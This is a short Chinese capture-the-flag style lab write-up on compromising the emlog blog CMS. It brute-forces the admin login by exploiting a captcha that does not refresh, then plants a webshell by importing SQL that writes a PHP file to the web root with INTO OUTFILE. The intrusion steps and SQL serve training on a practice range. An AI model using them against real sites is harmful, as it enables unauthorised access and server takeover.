墨者学院-CMS系统漏洞分析溯源(第6题)

靶场地址：
https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe

emlog 是 "Every Memory Log" 的简称，意即：点滴记忆。它是一款基于PHP语言和MySQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(blog)。基于PHP和MySQL的功能强大的博客及CMS建站系统。致力于提供快速、稳定，且在使用上又极其简单、舒适的博客服务。安装和使用都非常方便。目前 emlog 正在受到越来越多的广大用户的青睐。

emlog5.3.1和6.0测试版本均存在暴力破解漏洞，在登录错误的情况下，验证码并没有被刷新，因此验证码如同虚设

1.使用DirBuster暴力破解web目录，找到后台
如图/servlets为后台目录

2.用户名输入mozhe777，密码随意输入，输入正确的验证码，BurpSuite开启拦截，导入字典，这里使用的是弱密码top1000，百度就能搜到，爆破出口令为qwer1234

3.成功登录后台后利用备份/导入数据库写入一句话木马，备份数据库，下拉框选择emlog_blog：

在导出的数据库文件中添加数据库语句，内容为：

Drop TABLE IF EXISTS emlog_shell;
Create Table emlog_shell(`cmd` longtext NOT NULL);
Insert INTO emlog_shell VALUES('');
Select cmd from emlog_shell into outfile '/var/www/html/cmd.php';
Drop TABLE IF EXISTS emlog_shell;

将其导入，一句话写入完成，使用菜刀连接即可